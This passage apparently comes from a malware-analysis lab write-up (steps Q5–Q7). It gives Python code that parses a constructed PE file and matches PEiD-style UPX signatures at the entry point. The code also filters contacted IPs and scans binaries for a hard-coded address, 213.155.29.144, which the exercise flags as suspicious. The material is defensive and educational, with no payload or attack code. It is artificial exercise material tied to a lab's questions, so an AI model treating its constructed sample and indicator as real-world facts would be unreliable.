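Two of the steps above lend themselves to one small static script: the PEiD-style signature match that pefile-match performs in Q5, and a check that the address found in Q7 really is hard-coded in the binary. The following Python is an added example, not the write-up's, pefile's or PEiD's code. It builds a minimal PE32 in memory (sections UPX0/UPX1, a UPX-like stub prefix at the entry point, and the bytes d5 9b 1d 90 embedded in the data), parses the section table to map the entry-point RVA to a file offset, matches UserDB.TXT-style signatures with ?? wildcards, and then reproduces the IP triage of Q7: contacted IPs minus DNS-resolved minus private ranges, followed by a scan of the file for those addresses stored as ASCII or packed in network byte order. The signature entry is constructed and abbreviated; the real UPX entries in UserDB.TXT are far longer, and the IP lists are the ones from the tshark output above, typed in by hand.

```python
"""PE triage: PEiD-style entry-point signature match and hard-coded IPv4 scan.
Added example: the PE, the signature entry and the IP lists are all constructed."""
import ipaddress
import re
import struct

SECTION = struct.Struct("<8sIIIIIIHHI")                           # IMAGE_SECTION_HEADER

def build_sample_pe():
    """Constructed PE32: UPX0/UPX1 sections, a UPX-like stub at the entry point,
    and 213.155.29.144 stored as a packed in_addr (d5 9b 1d 90) in the data."""
    stub = bytes.fromhex("60BE00104000" "8DBE00F0FFFF" "57")       # pushad; mov esi; lea edi; push edi
    data = bytearray(0x200)
    data[0x100:0x100 + len(stub)] = stub
    data[0x180:0x184] = ipaddress.IPv4Address("213.155.29.144").packed
    ep_rva = 0x11000 + 0x100                                       # inside UPX1
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, 0, 0, 0, ep_rva, 0x1000, 0x2000).ljust(224, b"\0")
    secs = (SECTION.pack(b"UPX0", 0x10000, 0x1000, 0, 0x200, 0, 0, 0, 0, 0xE0000080)
            + SECTION.pack(b"UPX1", 0x1000, 0x11000, 0x200, 0x200, 0, 0, 0, 0, 0xE0000040))
    return (dos + coff + opt + secs).ljust(0x200, b"\0") + bytes(data)

def parse_pe(buf):
    """Entry-point RVA and section table read straight from the headers."""
    pe = struct.unpack_from("<I", buf, 0x3C)[0]                    # e_lfanew
    if buf[:2] != b"MZ" or buf[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = struct.unpack_from("<H", buf, pe + 6)[0], struct.unpack_from("<H", buf, pe + 20)[0]
    opt = pe + 24                                                  # optional header follows the COFF header
    sections = []
    for i in range(nsec):
        f = SECTION.unpack_from(buf, opt + opt_size + i * SECTION.size)
        sections.append({"name": f[0].rstrip(b"\0").decode(errors="replace"),
                         "vsize": f[1], "va": f[2], "raw_size": f[3], "raw_ptr": f[4]})
    return {"entry_rva": struct.unpack_from("<I", buf, opt + 16)[0], "sections": sections}

def rva_to_offset(pe, rva):
    """Map an RVA to a file offset through the section that contains it."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["raw_ptr"] + (rva - s["va"])
    return None

# Constructed, abbreviated entry in UserDB.TXT syntax; the real UPX entries are far longer.
SIGNATURE_DB = """
[UPX-like stub (constructed, abbreviated)]
signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57
ep_only = true
"""

def parse_signature_db(text):
    """Yield (name, pattern, ep_only); pattern is a list of ints with None for ??."""
    name, sig, ep_only = None, None, True
    for line in [ln.strip() for ln in text.splitlines()] + ["[end]"]:
        if line.startswith("[") and line.endswith("]"):
            if name and sig:
                yield name, sig, ep_only
            name, sig, ep_only = line[1:-1], None, True
        elif line.lower().startswith("signature"):
            sig = [None if t == "??" else int(t, 16) for t in line.split("=", 1)[1].split()]
        elif line.lower().startswith("ep_only"):
            ep_only = line.split("=", 1)[1].strip().lower() == "true"

def match_at(buf, off, pat):
    return (off is not None and off + len(pat) <= len(buf)
            and all(p is None or buf[off + i] == p for i, p in enumerate(pat)))

def identify_packer(buf, db_text=SIGNATURE_DB):
    """Signature names matching at the entry point (anywhere if ep_only = false),
    plus a section-name heuristic: stock UPX names its sections UPX0/UPX1/UPX2."""
    pe = parse_pe(buf)
    ep = rva_to_offset(pe, pe["entry_rva"])
    hits = [n for n, pat, ep_only in parse_signature_db(db_text)
            if (match_at(buf, ep, pat) if ep_only
                else any(match_at(buf, o, pat) for o in range(len(buf) - len(pat) + 1)))]
    names = [s["name"] for s in pe["sections"]]
    if any(n.startswith("UPX") for n in names):
        hits.append("UPX section names: " + ",".join(names))
    return hits

def _public(text):
    try:
        return ipaddress.IPv4Address(text).is_global
    except ValueError:                                             # e.g. "300.1.2.3"
        return False

def unresolved_public_ips(contacted, dns_answers):
    """Q7 step 3: contacted IPs minus DNS-resolved ones minus private/internal ranges."""
    return sorted(ip for ip in set(contacted) - set(dns_answers) if _public(ip))

ASCII_IPV4 = re.compile(rb"(?<![0-9.])(?:[0-9]{1,3}\.){3}[0-9]{1,3}(?![0-9.])")

def find_ipv4(buf, watch=()):
    """Public dotted quads stored as text, plus packed (network-order) forms of the
    `watch` addresses; packed forms need a watch-list because any 4 bytes look like an IP."""
    text_hits = {m.group().decode() for m in ASCII_IPV4.finditer(buf)}
    return {"ascii": sorted(a for a in text_hits if _public(a)),
            "packed": [w for w in watch if ipaddress.IPv4Address(w).packed in buf]}
```

Typical use is identify_packer(open("file.exe", "rb").read()) with the real UserDB.TXT passed as db_text, and find_ipv4(unpacked_bytes, unresolved_public_ips(contacted, resolved)) on the output of upx -d; run on the packed file the scan finds nothing, because the address only exists inside the compressed section, which is why the unpacking in Q6 has to come first.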